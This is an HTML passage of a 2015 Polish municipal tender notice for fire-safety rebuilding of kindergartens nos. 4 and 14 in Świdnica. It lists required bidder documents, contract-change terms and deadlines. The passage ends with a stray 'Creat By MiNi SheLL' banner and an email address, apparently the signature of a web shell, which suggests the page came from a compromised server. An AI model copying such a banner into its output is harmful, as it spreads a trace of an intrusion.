<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>oświadczenie o solidarnej odpowiedzialności za realizację zadania Wykonawcy i tych podmiotów (art. 369 k.c.);</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>7.19.	Dodatkowo Wykonawca winien do oferty dołączyć:
7.19.1.	Formularz ofertowy stanowiący (wzór zał. nr 1.1 i 1.2.),
7.19.2.	Oświadczenia i dokumenty, o których mowa w rozdz. 7 SWIZ,
7.19.3.	Pełnomocnictwo, o którym mowa w rozdz. 6 pkt 6.4 SIWZ,
7.19.4.	Dowód wniesienia wadium,
7.19.5.	Parafowany wzór umowy o roboty budowlane (wzór zał. nr 8.1 i 8.2.)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>18.	ISTOTNE DLA STRON POSTANOWIENIA UMOWY.
18.1.	Umowa zostanie zawarta na warunkach określonych we wzorze umowy, który stanowi załącznik nr 8.1 oraz 8.2 do SIWZ.
18.2.	Zakres świadczenia Wykonawcy wynikający z umowy będzie tożsamy z jego zobowiązaniem zawartym w ofercie złożonej w niniejszym postępowaniu o udzielenie zamówienia.
18.3.	Zamawiający dopuszcza zmiany umowy w formie pisemnej, aneksem zaakceptowanym przez obie strony umowy, pod rygorem nieważności w następujących przypadkach:
18.3.1.	Zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna) np. z powodu uzasadnionych zmian w zakresie sposobu wykonywania przedmiotu zamówienia proponowanych przez strony umowy, jeżeli te zmiany są korzystne dla Zamawiającego.
18.3.2.	Wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia, np. jeżeli nastąpi zmiana stawki podatku od towarów i usług (VAT),
18.3.3.	Zmiana sposobu świadczeń związana z:
a) aktualizacją lub zmianą dokumentacji projektowej (konieczność opracowania projektu zamiennego i zmiany pozwolenia na budowę),
b) odmiennymi od przyjętych w dokumentacji rozwiązań technicznych lub/i materiałowych 
w przypadku:
-gdyby zastosowanie przewidzianych rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
-zmiany obowiązującego prawa,
-niedostępności na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej spowodowane zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń,
18.3.4.	Zmiana terminu wykonania zamówienia w przypadku:
a) wystąpienia kolizji z niezinwentaryzowanymi podziemnymi urządzeniami, instalacją lub obiektami infrastrukturalnymi,
b) wystąpienia szczególnie niekorzystnych warunków atmosferycznych w szczególności: 
-obfitych i długotrwałych opadów atmosferycznych, w szczególności śniegu i deszczu,
-niskich temperatur uniemożliwiających realizację umowy, 
-klęsk żywiołowych występujących na terenie objętym realizacją umowy.
c) spowodowane wstrzymaniem robót przez Zamawiającego,
d) spowodowane koniecznością wprowadzenia zmian w dokumentacji projektowej,
e) spowodowane innymi przyczynami zewnętrznymi niezależnymi od Zamawiającego 
i Wykonawcy skutkuje niemożliwością uzyskania stosowanych decyzji, zezwoleń 
i uzgodnień. 
18.3.5.	Zmiany osobowe, przy pomocy, których Wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w rozdz. 6 pkt 6.1 ppkt 6.1.3 SIWZ w przypadku: 
a) śmierci, choroby lub innych zdarzeń losowych tych osób,
b) nie wywiązywania się osób z obowiązków wynikających z umowy,
c) rezygnacji tych osób z wykonywania swoich obowiązków.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2015 godzina 09:00, miejsce: Urząd Miejski w Świdnicy ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1.  Przebudowa budynku Przedszkola Miejskiego nr 4 w Świdnicy w zakresie dostosowania do    wymogów bezpieczeństwa pożarowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 .  Przebudowa budynku Przedszkola Miejskiego nr 4 w Świdnicy w zakresie dostosowania do    wymogów bezpieczeństwa pożarowego.

Celem realizacji zadania jest dostosowanie budynku Przedszkola Miejskiego nr 4 do wymogów bezpieczeństwa pożarowego. Funkcja budynku bez zmian. Dla potrzeb spełnienia wymagań bezpieczeństwa pożarowego przewidziano korektę wewnętrznego układu komunikacji poprzez wydzielenie klatki schodowej ściankami ogniochronnymi o REI60 z przeszkleniami EI60 na parterze, na I piętrze i poddaszu. 
W wydzielonej klatce schodowej należy zamontować  dwa okna  połaciowe  z funkcją klapy oddymiającej. 
W części pomieszczeń zastosowano drzwi ppoż.
Ponadto przewiduje się wykonanie: 
-Instalacji hydrantowej wodnej ppoż. z hydrantami na każdej kondygnacji.
-Wymianę w instalacji oświetlenia ewakuacyjnego opraw awaryjnych o natężeniu 1lx na oprawy 
o natężeniu 2lx wraz z okablowaniem.
-Instalacji oddymiania klatki schodowej.
-Zamontowanie czujek dymu w pomieszczeniach komunikacyjnych.
-Zgodnie z Warunkami technicznymi Nr TI-403/426/2012 z dnia 13.11.2012r. przewidziano wymianę istniejącego wodociągu o32 na wodociąg z rur PE50  SDR11. Na przyłączu zamontować należy zasuwę żeliwną kołnierzową dn50. Przyłącze krzyżuje się z uzbrojeniem podziemnym tj. kablem eANN.  Przyłącze przebiega w odległości ~1,00m od istniejącego drzewa. Na tym odcinku wykop wykonywać ręcznie a istniejące korzenie zabezpieczyć przed uszkodzeniem. Przebieg przyłącza pokazano na mapie, rzucie piwnic oraz profilu. Po wykonaniu instalację należy zdezynfekować oraz poddać próbie ciśnienia i szczelności zgodnie z wymogami normy  PN=81/B-10725 na ciśnienie nie mniejsze niż 1,0Mpa oraz zamontować zawór antyskażeniowy . Wykonaną instalację wodociągową przed zasypaniem należy zgłosić do odbioru   ŚPWiK  w Świdnicy 
i uzyskać pozytywny protokół odbioru.
-Wykonawca ujmie w ofercie odtworzenie nawierzchni istniejącego chodnika  po wykonywanych robotach podczas wymiany przyłącza wod-kan.
-Wykonawca ujmie w ofercie odtworzenie pokrycia połaci dachowych po zakończonych robotach montażowych okien dachowych materiałem identycznym do istniejącego (certyfikat na rodzaj materiałów zastosowanych przy wykonywaniu połaci dachowych dodano do załączników niniejszej SIWZ).
-Wykonawca ujmie w ofercie malowanie poręczy  na klatce schodowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. gwarancja jakości - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 . Przebudowa budynku Przedszkola Miejskiego nr 14 w Świdnicy w zakresie dostosowania do   wymogów bezpieczeństwa pożarowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 .  Przebudowa budynku Przedszkola Miejskiego nr 14 w Świdnicy w zakresie dostosowania do   wymogów bezpieczeństwa pożarowego.

Celem realizacji zadania jest dostosowanie budynku Przedszkola Miejskiego nr 14 do wymogów bezpieczeństwa pożarowego. Układ funkcjonalny budynku pozostaje bez zmian. Dojazd gospodarczy bez zmian. Przewidywane roboty remontowo-modernizacyjne będą wykonywane metodą tradycyjną. Zakłada się następujące roboty obejmujące poszczególne elementy budynku:
-Na parterze po demontażu istniejących drzwi zastosowanie w ich miejsce nowych drzwi  70/200 ppoż.  wewnętrznych do piwnicy jednoskrzydłowych,  metalowych laminowanych, ocieplonych, 
z samozamykaczem, z pasem dolnym zabezpieczonym fabrycznie blachą nierdzewną grub.  0,5 mm szerokości 15 cm; spełniających wymagania klasy EI30.
-W pomieszczeniu w szatni (pom. 1.5.), holu (pom.1.2.) oraz korytarzu (pom. 2.2.) przewiduje się ułożenie wykładziny PCV trudno zapalnej posiadającej odpowiedni atest o trudno zapalności po uprzednim demontażu istniejącej wykładziny PCV.  
-Wykonać tynki cem-wap. kat.IV na ścianach  pomieszczeń szatni (pom. 1.5.), holu (pom. 1.2.), przedsionka (pom. 1.1.), z których zdemontowano boazerię z drewna. W części komunikacyjnej narożniki ścian należy zabezpieczyć aluminiowymi narożnikami ochronnymi podtynkowymi przed uszkodzeniami mechanicznymi. 
-Pomalowanie farbami o zwiększonej odporności (np. lateksowymi) - na całą wysokość pomieszczenia w jasnym kolorze ścian pomieszczenia parteru: szatni (pom. 1.5.), holu (pom. 1.2.), przedsionka (pom. 1.1.),  i I piętra: korytarza  (pom. 2.2.). 
Ponadto przewiduje się wykonanie: 
-Wymiany  wszystkich hydrantów na parterze i I piętrze w istniejącej instalacji hydrantowej wodnej ppoż.
-Instalacji elektrycznej oświetlenia ewakuacyjnego.
-Instalacji sygnalizacji pożaru.
-Zamontowanie  wyłącznika prądu ppoż. 
 Dodatkowo Wykonawca ujmie w ofercie:
-Wymianę drzwi zewnętrznych  klatki bocznej.
-Wymianę wykładziny na klatce schodowej  (pom. 2.1.) na wykładzinę posiadającą atest 
o trudno zapalności. 
-Malowanie balustrady schodowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.20.00.00-9, 45.30.00.00-0, 45.40.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.08.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. gwarancja jakości - 15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com